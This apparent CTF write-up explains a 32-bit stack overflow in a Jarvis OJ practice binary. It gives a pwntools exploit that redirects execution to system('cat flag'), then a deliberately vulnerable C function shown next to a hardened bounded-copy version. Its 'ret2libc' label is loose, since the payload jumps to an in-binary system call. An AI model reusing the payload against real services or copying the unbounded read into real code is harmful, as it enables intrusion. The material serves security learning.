A simple 32-bit stack overflow. Decompiling the binary in IDA shows the parameter `cat flag` being passed inside the `memtest` function, and the `winfunc` function calling the library function `system`.
![](https://img.haomeiwen.com/i7320599/6997ce28096adcce.png)
![](https://img.haomeiwen.com/i7320599/01f99d43b8d42ff8.png)
ret2libc, straight to getshell:

```python
from pwn import *

p = remote("pwn2.jarvisoj.com", 9876)

callsystem = 0x080485BD   # address of the call to system inside winfunc
catflag = 0x080487E0      # address of the "cat flag" string

# 0x13 bytes fill the buffer, 4 more overwrite the saved ebp, then the
# return address is replaced by the system call, followed by a return
# address for system (never used) and the pointer to "cat flag" as its argument.
# Bytes, not str, so the payload also works on Python 3.
payload = b'a' * (0x13 + 4) + p32(callsystem) + p32(0x08048677) + p32(catflag)
p.sendline(payload)
p.interactive()
```
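The page does not include the source of `memtest`, so the following is an added example, not the challenge binary's code: a hypothetical reconstruction of the vulnerable read pattern (buffer size 0x13 inferred from the padding in the payload) next to a hardened version that bounds the copy and reports truncation.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Hypothetical stand-in for the binary's memtest(): the writeup does not
 * show its source, so the buffer size (0x13, inferred from the 0x13 + 4
 * padding in the exploit) and the read call are assumptions. */
#define BUF_SIZE 0x13

/* Vulnerable shape: an unbounded read into a fixed stack buffer lets input
 * longer than BUF_SIZE run past the buffer into the saved frame pointer and
 * the return address. Shown for reference only; never called here. */
void memtest_vulnerable(void) {
    char buf[BUF_SIZE];
    scanf("%s", buf);   /* no length limit: anything over 0x13 bytes overflows */
    printf("%s\n", buf);
}

/* Hardened form: copy at most outlen-1 bytes, always NUL-terminate, and
 * return whether the input fit so the caller can reject truncated input
 * instead of silently processing a clipped value. */
bool memtest_hardened(const char *input, char *out, size_t outlen) {
    if (outlen == 0) return false;
    size_t n = strlen(input);
    bool fits = n < outlen;
    size_t copy = fits ? n : outlen - 1;
    memcpy(out, input, copy);
    out[copy] = '\0';
    return fits;
}

int main(void) {
    char buf[BUF_SIZE];
    char oversized[64];                 /* constructed input longer than the buffer */
    memset(oversized, 'a', 63);
    oversized[63] = '\0';
    printf("short input fits: %d\n", memtest_hardened("hello", buf, sizeof buf));
    printf("oversized input fits: %d\n", memtest_hardened(oversized, buf, sizeof buf));
    return 0;
}
```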